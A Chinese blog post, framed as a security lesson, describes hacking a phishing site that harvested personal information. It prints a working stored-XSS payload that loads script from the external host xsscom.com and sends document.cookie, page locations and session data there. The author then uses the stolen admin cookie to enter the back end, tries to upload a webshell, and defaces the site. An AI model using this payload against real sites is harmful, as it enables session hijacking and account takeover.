惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Tenable Blog
Last Week in AI
Last Week in AI
P
Proofpoint News Feed
Engineering at Meta
Engineering at Meta
H
Help Net Security
F
Fortinet All Blogs
MyScale Blog
MyScale Blog
宝玉的分享
宝玉的分享
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
博客园 - 司徒正美
量子位
N
Netflix TechBlog - Medium
Apple Machine Learning Research
Apple Machine Learning Research
小众软件
小众软件
Recorded Future
Recorded Future
博客园 - 三生石上(FineUI控件)
Vercel News
Vercel News
aimingoo的专栏
aimingoo的专栏
I
InfoQ
Microsoft Security Blog
Microsoft Security Blog
Scott Helme
Scott Helme
The Last Watchdog
The Last Watchdog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
IT之家
IT之家
AI
AI
WordPress大学
WordPress大学
Security Archives - TechRepublic
Security Archives - TechRepublic
Google Online Security Blog
Google Online Security Blog
U
Unit 42
V2EX - 技术
V2EX - 技术
MongoDB | Blog
MongoDB | Blog
Schneier on Security
Schneier on Security
博客园 - Franky
H
Heimdal Security Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Jina AI
Jina AI
W
WeLiveSecurity
P
Privacy & Cybersecurity Law Blog
Cloudbric
Cloudbric
B
Blog RSS Feed
N
News | PayPal Newsroom
S
Securelist
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
I
Intezer
Hacker News - Newest:
Hacker News - Newest: "LLM"
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
博客园_首页
罗磊的独立博客
H
Hackread – Cybersecurity News, Data Breaches, AI and More
雷峰网
雷峰网

龙辉's Blog - php

贵州师范大学抢课脚本-正方教务系统V8.0.0 - 龙辉's Blog 简单实现每日健康自动打卡 - 龙辉's Blog php获取客户端ip以及ip伪造 - 龙辉's Blog php7.2中each()函数被弃用的替换办法 - 龙辉's Blog 云签网站问题反馈贴 - 龙辉's Blog 贴吧关注类-php - 龙辉's Blog 给网站接入QQ登录,无需申请QQ互联 - 龙辉's Blog ezsql-超级好用的操作类 - 龙辉's Blog php对称加密 - 龙辉's Blog
XSS经典漏洞复现-手撕某非法获取个人信息网站 - 龙辉's Blog
博主: Tinker-站长 · 2022-05-29 · via 龙辉's Blog - php
  • 发布时间:
  • 5156 次浏览
  • 1 条评论
  • 2485字数
  • 分类: php
  1. 首页
  2. 正文  
  3. 分享到:

记一次手动入侵某个非法获取个人信息网站

想到诈骗分子现在还是这么猖狂,居然把非法获取个人信息的二维码发到我的眼前,这我又怎么能忍~这不得想办法打掉他.随便做一下网络安全科普,当然了,自己也还是在学习的小白.

声明:以下仅为一次简单的记录,提供思路及过程,仅供学习交流,请不要用于非法用途,由此教程产生的法律问题均与本人无关!

0x01

和往常一样正常打开QQ,无意间看到群消息有这么一个文档.qrcode.png,出于本能,这肯定是个钓鱼网站...那就扫进去看看究竟有什么猫腻.index.jpg,可以看到,扫进去之后是这么一个页面。吐槽一下这网站做得一眼假好吧。。但是上当受骗的人还是很多。

0x02

为了先了解一下网站结构,先随便输入信息提交吧。~K1%RW03KKUTM}OV8@%Z6_N.png,随便输入账号密码,进入到index.jpg,一样随便输入一些符合规则的文字进去。成功提交.网站返回。基本就是这么一个流程

0x03

漏洞复现

只要用户能输入的地方大部分都存在xss漏洞,其中储存型漏洞伤害较大。在输入框这里输入js代码,可用src引入引入自己的代码,![X3OEB9NMB1(13YBW4[8NS]T.png][5]

<div style="display:none"><script src=http://xsscom.com//Wn7zcb></script></div>

其中引入的具体代码如下

(function(){(new Image()).src='http://xsscom.com/index.php?do=api&id=Wn7zcb&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://xsscom.com/index.php?do=keepsession&id=Wn7zcb&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

利用的是后台直接输出用户输出的内容,浏览器直接执行用户输入的恶意木马,能够document.cookie,当后台执行我插入的木马之后,就会发送后台地址以及token到我这里。没一会儿就中招了。

![`E8T]0$E(BHM2(APAOXI7Q.png
可以看到后台地址,对方的ip以及ua信息,cookie。成功进入后台
%XR(}UC6LLCBNCS4C3$B[VN.png
可以看到很多大学生的信息...而且很多条,并且它有很多个网站,所以收集了大量信息,并且又利用被获取的继续发送,广泛传播。原本想在这个上传点传入大马getshell的,但是一直没能成功,图片马也不能解析。因此没有获取到服务器。只能挂个黑页了

(W1D5}V{044US$[`653C$WO.png

所有呢在最后我希望你们不要看到获取信息的输入框就输入自己的个人信息,也不要随便扫二维码。在打开未知的网站前可以去去工信部查询对方网站是否为备案以及有相应的运行资质。政府网站后缀统一为gov.cn,学校网站后缀统一为edu.cn后缀等

我的博客即将同步至腾讯云+社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=qpwmu9jb7yaa


版权属于:龙辉博客

本文链接:https://blog.eirds.cn/377.html

如果没有特别声明则为本博原创。转载时须注明出处及本声明!

赞赏作者

如果觉得我的文章对你有用,请随意赞赏

XSS经典漏洞复现-手撕某非法获取个人信息网站